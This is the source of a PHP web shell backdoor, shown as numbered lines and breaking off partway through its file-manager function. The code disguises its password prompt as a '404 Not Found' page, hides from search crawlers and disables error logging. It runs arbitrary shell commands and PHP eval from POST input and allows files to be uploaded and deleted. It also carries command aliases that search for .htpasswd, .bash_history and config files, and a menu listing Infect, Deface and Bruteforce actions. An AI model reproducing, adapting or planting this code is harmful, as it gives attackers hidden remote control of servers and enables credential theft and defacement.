$auth_pass = "332532dcfaa1cbf61e2a266bd723612c";$color = "#00ff00";$sec = 1;

1. $auth_pass = "332532dcfaa1cbf61e2a266bd723612c";
2. $color = "#00ff00";
3. $sec = 1;
4. $default_action = 'FilesMan';
5. @define('SELF_PATH', __FILE__);
6.  
7.  
8. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
9. $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "facebook","yahoo");
10. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
11. header('HTTP/1.0 404 Not Found');
12. exit;
13. }
14. }
15. @session_start();
16. @error_reporting(0);
17. @ini_set('error_log',NULL);
18. @ini_set('log_errors',0);
19. @ini_set('max_execution_time',0);
20. @set_time_limit(0);
21. @set_magic_quotes_runtime(0);
22. @define('VERSION' , '2.6.5 by Drac-101code');
23. if( get_magic_quotes_gpc() ) {
24. function stripslashes_array($array) {
25. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
26. }
27. $_POST = stripslashes_array($_POST);
28. }
29. function printLogin() {
30. ?>
31. <h1>Not Found</h1>
32. <p>The requested URL was not found on this server.</p>
33. <hr>
34. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
35. <style>
36. input { margin:0;background-color:#fff;border:1px solid #fff; }
37. </style>
38. <center>
39. <form method=post>
40. <input type=password name=pass>
41. </form></center>
42. <?php
43. exit;
44. }
45. if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
46. if( empty( $auth_pass ) ||
47. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
48. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
49. else
50. printLogin();
51.  
52. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
53. $os = 'win';
54. else
55. $os = 'nix';
56. $safe_mode = @ini_get('safe_mode');
57. $disable_functions = @ini_get('disable_functions');
58. $home_cwd = @getcwd();
59. if( isset( $_POST['c'] ) )
60. @chdir($_POST['c']);
61. $cwd = @getcwd();
62. if( $os == 'win') {
63. $home_cwd = str_replace("\\", "/", $home_cwd);
64. $cwd = str_replace("\\", "/", $cwd);
65. }
66. if( $cwd[strlen($cwd)-1] != '/' )
67. $cwd .= '/';
68.  
69. if($os == 'win')
70. $aliases = array(
71. "List Directory" => "dir",
72. "Find index.php in current dir" => "dir /s /w /b index.php",
73. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
74. "Show active connections" => "netstat -an",
75. "Show running services" => "net start",
76. "User accounts" => "net user",
77. "Show computers" => "net view",
78. "ARP Table" => "arp -a",
79. "IP Configuration" => "ipconfig /all"
80. );
81. else
82. $aliases = array(
83. "List dir" => "ls -la",
84. "list file attributes on a Linux second extended file system" => "lsattr -va",
85. "show opened ports" => "netstat -an | grep -i listen",
86. "Find" => "",
87. "find all suid files" => "find / -type f -perm -04000 -ls",
88. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
89. "find all sgid files" => "find / -type f -perm -02000 -ls",
90. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
91. "find config.inc.php files" => "find / -type f -name config.inc.php",
92. "find config* files" => "find / -type f -name \"config*\"",
93. "find config* files in current dir" => "find . -type f -name \"config*\"",
94. "find all writable folders and files" => "find / -perm -2 -ls",
95. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
96. "find all service.pwd files" => "find / -type f -name service.pwd",
97. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
98. "find all .htpasswd files" => "find / -type f -name .htpasswd",
99. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
100. "find all .bash_history files" => "find / -type f -name .bash_history",
101. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
102. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
103. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
104. "Locate" => "",
105. "locate httpd.conf files" => "locate httpd.conf",
106. "locate vhosts.conf files" => "locate vhosts.conf",
107. "locate proftpd.conf files" => "locate proftpd.conf",
108. "locate psybnc.conf files" => "locate psybnc.conf",
109. "locate my.conf files" => "locate my.conf",
110. "locate admin.php files" =>"locate admin.php",
111. "locate cfg.php files" => "locate cfg.php",
112. "locate conf.php files" => "locate conf.php",
113. "locate config.dat files" => "locate config.dat",
114. "locate config.php files" => "locate config.php",
115. "locate config.inc files" => "locate config.inc",
116. "locate config.inc.php" => "locate config.inc.php",
117. "locate config.default.php files" => "locate config.default.php",
118. "locate config* files " => "locate config",
119. "locate .conf files"=>"locate '.conf'",
120. "locate .pwd files" => "locate '.pwd'",
121. "locate .sql files" => "locate '.sql'",
122. "locate .htpasswd files" => "locate '.htpasswd'",
123. "locate .bash_history files" => "locate '.bash_history'",
124. "locate .mysql_history files" => "locate '.mysql_history'",
125. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
126. "locate backup files" => "locate backup",
127. "locate dump files" => "locate dump",
128. "locate priv files" => "locate priv"
129. );
130.  
131. function printHeader() {
132. if(empty($_POST['charset']))
133. $_POST['charset'] = "UTF-8";
134. global $color;
135. ?>
136. <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found<?=VERSION?></title>
137. <style>
138. body {background-color:#000;color:#fff;}
139. body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
140. span,h1,a { color:<?=$color?> !important; }
141. span { font-weight: bolder; }
142. h1 { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
143. div.content { padding: 5px;margin-left:5px;}
144. a { text-decoration:none; }
145. a:hover { background:#ff0000; }
146. .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
147. .bigarea { width:100%;height:250px; }
148. input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
149. form { margin:0px; }
150. #toolsTbl { text-align:center; }
151. .toolsInp { width: 80%; }
152. .main th {text-align:left;}
153. .main tr:hover{background-color:#5e5e5e;}
154. .main td, th{vertical-align:middle;}
155. pre {font-family:Courier,Monospace;}
156. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
157. </style>
158. <script>
159. function set(a,c,p1,p2,p3,p4,charset) {
160. if(a != null)document.mf.a.value=a;
161. if(c != null)document.mf.c.value=c;
162. if(p1 != null)document.mf.p1.value=p1;
163. if(p2 != null)document.mf.p2.value=p2;
164. if(p3 != null)document.mf.p3.value=p3;
165. if(p4 != null)document.mf.p4.value=p4;
166. if(charset != null)document.mf.charset.value=charset;
167. }
168. function g(a,c,p1,p2,p3,charset) {
169. set(a,c,p1,p2,p3,charset);
170. document.mf.submit();
171. }
172. function da2(a,c,p1,p2,p3,p4,charset) {
173. set(a,c,p1,p2,p3,p4,charset);
174. document.mf.submit();
175. }
176. function a(a,c,p1,p2,p3,charset) {
177. set(a,c,p1,p2,p3,charset);
178. var params = "ajax=true";
179. for(i=0;i<document.mf.elements.length;i++)
180. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
181. sr('<?=$_SERVER['REQUEST_URI'];?>', params);
182. }
183. function sr(url, params) {
184. if (window.XMLHttpRequest) {
185. req = new XMLHttpRequest();
186. req.onreadystatechange = processReqChange;
187. req.open("POST", url, true);
188. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
189. req.send(params);
190. }
191. else if (window.ActiveXObject) {
192. req = new ActiveXObject("Microsoft.XMLHTTP");
193. if (req) {
194. req.onreadystatechange = processReqChange;
195. req.open("POST", url, true);
196. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
197. req.send(params);
198. }
199. }
200. }
201. function processReqChange() {
202. if( (req.readyState == 4) )
203. if(req.status == 200) {
204.  
205. //alert(req.responseText);
206. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
207. var arr=reg.exec(req.responseText);
208. eval(arr[2].substr(0, arr[1]));
209. }
210. else alert("Request error!");
211. }
212. </script>
213. <head><body><div style="position:absolute;width:100%;top:0;left:0;">
214. <form method=post name=mf style='display:none;'>
215. <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
216. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
217. <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
218. <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
219. <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
220. <input type=hidden name=p4 value='<?=isset($_POST['p4'])?htmlspecialchars($_POST['p4']):''?>'>
221. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
222. </form>
223. <?php
224. $freeSpace = @diskfreespace($GLOBALS['cwd']);
225. $totalSpace = @disk_total_space($GLOBALS['cwd']);
226. $totalSpace = $totalSpace?$totalSpace:1;
227. $release = @php_uname('r');
228. $kernel = @php_uname('s');
229. $millink='http://www.exploit-db.com/search/?action=search&filter_description=';
230. // fixme
231. $millink2='http://www.1337day.com/search';
232.  
233. if( strpos('Linux', $kernel) !== false )
234. $millink .= urlencode( '' . substr($release,0,6) );
235. else
236. $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
237. if(!function_exists('posix_getegid')) {
238. $user = @get_current_user();
239. $uid = @getmyuid();
240. $gid = @getmygid();
241. $group = "?";
242. } else {
243. $uid = @posix_getpwuid(@posix_geteuid());
244. $gid = @posix_getgrgid(@posix_getegid());
245. $user = $uid['name'];
246. $uid = $uid['uid'];
247. $group = $gid['name'];
248. $gid = $gid['gid'];
249. }
250.  
251. $cwd_links = '';
252. $path = explode("/", $GLOBALS['cwd']);
253. $n=count($path);
254. for($i=0;$i<$n-1;$i++) {
255. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
256. for($j=0;$j<=$i;$j++)
257. $cwd_links .= $path[$j].'/';
258. $cwd_links .= "\")'>".$path[$i]."/</a>";
259. }
260. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
261. $opt_charsets = '';
262. foreach($charsets as $item)
263. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
264. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Infect'=>'Infect','Readable'=>'Readable','Test'=>'Test','CgiShell'=>'CgiShell','Symlink'=>'Symlink','Deface'=>'Deface', 'Domain'=>'Domain','ZHposter'=>'ZHposter');
265.  
266. if(!empty($GLOBALS['auth_pass']))
267. $m['Logout'] = 'Logout';
268. $m['Self remove'] = 'SelfRemove';
269. $menu = '';
270. foreach($m as $k => $v)
271. $menu .= '<th width="'.(int)(1/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
272. $drives = "";
273. if ($GLOBALS['os'] == 'win') {
274. foreach( range('a','z') as $drive )
275. if (is_dir($drive.':\\'))
276. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
277. }
278. echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.
279. '<td>:<nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[exploit-db]</a> <a href="'.$millink2.'" target=_blank>[1337day]</a>
280. Download : <a href="http://www.google.com" target=_blank>[SideKick1]</a>
281. <a href="http://www.google.com" target=_blank>[SideKick2]</a>
282. </nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' ) <span>Usefull Locals:</span> '.rootxpL().' <br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
283. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
284. '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
285. }
286.  
287. function printFooter() {
288. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
289. ?>
290. </div>
291. <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
292. <tr>
293. <td><form onSubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
294. <td><form onSubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
295. </tr>
296. <tr>
297. <td><form onSubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
298. <td><form onSubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
299. </tr>
300. <tr>
301. <td><form onSubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
302. <td><form method='post' ENCTYPE='multipart/form-data'>
303. <input type=hidden name=a value='FilesMAn'>
304. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
305. <input type=hidden name=p1 value='uploadFile'>
306. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
307. <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
308. </tr>
309.  
310. </table>
311. </div>
312. </body></html>
313. <?php
314. }
315. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
316. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
317. function ex($in) {
318. $out = '';
319. if(function_exists('exec')) {
320. @exec($in,$out);
321. $out = @join("\n",$out);
322. }elseif(function_exists('passthru')) {
323. ob_start();
324. @passthru($in);
325. $out = ob_get_clean();
326. }elseif(function_exists('system')) {
327. ob_start();
328. @system($in);
329. $out = ob_get_clean();
330. }elseif(function_exists('shell_exec')) {
331. $out = shell_exec($in);
332. }elseif(is_resource($f = @popen($in,"r"))) {
333. $out = "";
334. while(!@feof($f))
335. $out .= fread($f,1024);
336. pclose($f);
337. }
338. return $out;
339. }
340. function viewSize($s) {
341. if($s >= 1073741824)
342. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
343. elseif($s >= 1048576)
344. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
345. elseif($s >= 1024)
346. return sprintf('%1.2f', $s / 1024 ) . ' KB';
347. else
348. return $s . ' B';
349. }
350.  
351. function perms($p) {
352. if (($p & 0xC000) == 0xC000)$i = 's';
353. elseif (($p & 0xA000) == 0xA000)$i = 'l';
354. elseif (($p & 0x8000) == 0x8000)$i = '-';
355. elseif (($p & 0x6000) == 0x6000)$i = 'b';
356. elseif (($p & 0x4000) == 0x4000)$i = 'd';
357. elseif (($p & 0x2000) == 0x2000)$i = 'c';
358. elseif (($p & 0x1000) == 0x1000)$i = 'p';
359. else $i = 'u';
360. $i .= (($p & 0x0100) ? 'r' : '-');
361. $i .= (($p & 0x0080) ? 'w' : '-');
362. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
363. $i .= (($p & 0x0020) ? 'r' : '-');
364. $i .= (($p & 0x0010) ? 'w' : '-');
365. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
366. $i .= (($p & 0x0004) ? 'r' : '-');
367. $i .= (($p & 0x0002) ? 'w' : '-');
368. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
369. return $i;
370. }
371. function viewPermsColor($f) {
372. if (!@is_readable($f))
373. return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
374. elseif (!@is_writable($f))
375. return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
376. else
377. return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
378. }
379. if(!function_exists("scandir")) {
380. function scandir($dir) {
381. $dh = opendir($dir);
382. while (false !== ($filename = readdir($dh))) {
383. $files[] = $filename;
384. }
385. return $files;
386. }
387. }
388. function which($p) {
389. $path = ex('which '.$p);
390. if(!empty($path))
391. return $path;
392. return false;
393. }
394. function actionSecInfo() {
395. printHeader();
396. echo '<h1>Server security information</h1><div class=content>';
397. function showSecParam($n, $v) {
398. $v = trim($v);
399. if($v) {
400. echo '<span>'.$n.': </span>';
401. if(strpos($v, "\n") === false)
402. echo $v.'<br>';
403. else
404. echo '<pre class=ml1>'.$v.'</pre>';
405. }
406. }
407.  
408. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
409. if(function_exists('apache_get_modules'))
410. showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
411. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
412. showSecParam('Open base dir', @ini_get('open_basedir'));
413. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
414. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
415. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
416. $temp=array();
417. if(function_exists('mysql_get_client_info'))
418. $temp[] = "MySql (".mysql_get_client_info().")";
419. if(function_exists('mssql_connect'))
420. $temp[] = "MSSQL";
421. if(function_exists('pg_connect'))
422. $temp[] = "PostgreSQL";
423. if(function_exists('oci_connect'))
424. $temp[] = "Oracle";
425. showSecParam('Supported databases', implode(', ', $temp));
426. echo '<br>';
427.  
428. if( $GLOBALS['os'] == 'nix' ) {
429. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
430. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
431. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
432. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
433. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
434. showSecParam('OS version', @file_get_contents('/proc/version'));
435. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
436. if(!$GLOBALS['safe_mode']) {
437. echo '<br>';
438. $temp=array();
439. foreach ($userful as $item)
440. if(which($item)){$temp[]=$item;}
441. showSecParam('Userful', implode(', ',$temp));
442. $temp=array();
443. foreach ($danger as $item)
444. if(which($item)){$temp[]=$item;}
445. showSecParam('Danger', implode(', ',$temp));
446. $temp=array();
447. foreach ($downloaders as $item)
448. if(which($item)){$temp[]=$item;}
449. showSecParam('Downloaders', implode(', ',$temp));
450. echo '<br/>';
451. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
452. showSecParam('HDD space', ex('df -h'));
453. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
454. }
455. } else {
456. showSecParam('OS Version',ex('ver'));
457. showSecParam('Account Settings',ex('net accounts'));
458. showSecParam('User Accounts',ex('net user'));
459. }
460. echo '</div>';
461. printFooter();
462. }
463.  
464. function actionPhp() {
465. if( isset($_POST['ajax']) ) {
466. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
467. ob_start();
468. eval($_POST['p1']);
469. $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
470. echo strlen($temp), "\n", $temp;
471. exit;
472. }
473. printHeader();
474. if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
475. echo '<h1>PHP info</h1><div class=content>';
476. ob_start();
477. phpinfo();
478. $tmp = ob_get_clean();
479. $tmp = preg_replace('!body {.*}!msiU','',$tmp);
480. $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
481. $tmp = preg_replace('!h1!msiU','h2',$tmp);
482. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
483. $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
484. echo $tmp;
485. echo '</div><br>';
486. }
487. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
488. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
489. echo '<h1>Execution PHP-code</h1> example : echo file_get_contents(`/etc/passwd`); <div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
490. echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
491. if(!empty($_POST['p1'])) {
492. ob_start();
493. eval($_POST['p1']);
494. echo htmlspecialchars(ob_get_clean());
495. }
496. echo '</pre></div>';
497. printFooter();
498. }
499.  
500. function actionFilesMan() {
501. printHeader();
502. echo '<h1>File manager</h1><div class=content>';
503. if(isset($_POST['p1'])) {
504. switch($_POST['p1']) {
505. case 'uploadFile':
506. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
507. echo "Can't upload file!";
508. break;
509. break;
510. case 'mkdir':
511. if(!@mkdir($_POST['p2']))
512. echo "Can't create new dir";
513. break;
514. case 'delete':
515. function deleteDir($path) {
516. $path = (substr($path,-1)=='/') ? $path:$path.'/';
517. $dh = opendir($path);
518. while ( ($item = readdir($dh) ) !== false) {
519. $item = $path.$item;
520. if ( (basename($item) == "..") || (basename($item) == ".") )
521. continue;
522. $type = filetype($item);
523. if ($type == "dir")
524. deleteDir($item);
525. else
526. @unlink($item);
527. }
528. closedir($dh);
529. rmdir($path);
530. }
531. if(is_array(@$_POST['f']))
532. foreach($_POST['f'] as $f) {
533. $f = urldecode($f);
534. if(is_dir($f))
535. deleteDir($f);
536. else
537. @unlink($f);
538. }
539. break;
540. case 'paste':
541. if($_SESSION['act'] == 'copy') {
542. function copy_paste($c,$s,$d){
543. if(is_dir($c.$s)){
544. mkdir($d.$s);
545. $h = opendir($c.$s);
546. while (($f = readdir($h)) !== false)
547. if (($f != ".") and ($f != "..")) {
548. copy_paste($c.$s.'/',$f, $d.$s.'/');
549. }
550. } elseif(is_file($c.$s)) {
551. @copy($c.$s, $d.$s);
552. }
553. }
554. foreach($_SESSION['f'] as $f)
555. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
556. } elseif($_SESSION['act'] == 'move') {
557. function move_paste($c,$s,$d){
558. if(is_dir($c.$s)){
559. mkdir($d.$s);
560. $h = opendir($c.$s);
561. while (($f = readdir($h)) !== false)
562. if (($f != ".") and ($f != "..")) {
563. copy_paste($c.$s.'/',$f, $d.$s.'/');
564. }
565. } elseif(is_file($c.$s)) {
566. @copy($c.$s, $d.$s);
567. }
568. }
569. foreach($_SESSION['f'] as $f)
570. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
571. }
572. unset($_SESSION['f']);
573. break;
574. default:
575. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
576. $_SESSION['act'] = @$_POST['p1'];
577. $_SESSION['f'] = @$_POST['f'];
578. foreach($_SESSION['f'] as $k => $f)
579. $_SESSION['f'][$k] = urldecode($f);
580. $_SESSION['cwd'] = @$_POST['c'];
581. }
582. break;
583. }
584. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
585. }
586. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
587. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
588. global $sort;
589. $sort = array('name', 1);
590. if(!empty($_POST['p1'])) {
591. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
592. $sort = array($match[1], (int)$match[2]);
593. }
594. ?>
595. <script>
596. function sa() {
597. for(i=0;i<document.files.elements.length;i++)
598. if(document.files.elements[i].type == 'checkbox')
599. document.files.elements[i].checked = document.files.elements[0].checked;
600. }
601. </script>
602. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
603. <form name=files method=post>
604. <?php
605. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
606. $dirs = $files = $links = array();
607. $n = count($dirContent);
608. for($i=0;$i<$n;$i++) {
609. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
610. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
611. $tmp = array('name' => $dirContent[$i],
612. 'path' => $GLOBALS['cwd'].$dirContent[$i],
613. 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
614. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
615. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
616. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
617. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
618. );
619. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
620. $files[] = array_merge($tmp, array('type' => 'file'));
621. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
622. $links[] = array_merge($tmp, array('type' => 'link'));
623. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
624. $dirs[] = array_merge($tmp, array('type' => 'dir'));
625. }
626. $GLOBALS['sort'] = $sort;
627. function cmp($a, $b) {
628. if($GLOBALS['sort'][0] != 'size')
629. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
630. else
631. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
632. }
633. usort($files, "cmp");
634. usort($dirs, "cmp");
635. usort($links, "cmp");
636. $files = array_merge($dirs, $links, $files);
637. $l = 0;
638. foreach($files as $f) {
639. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
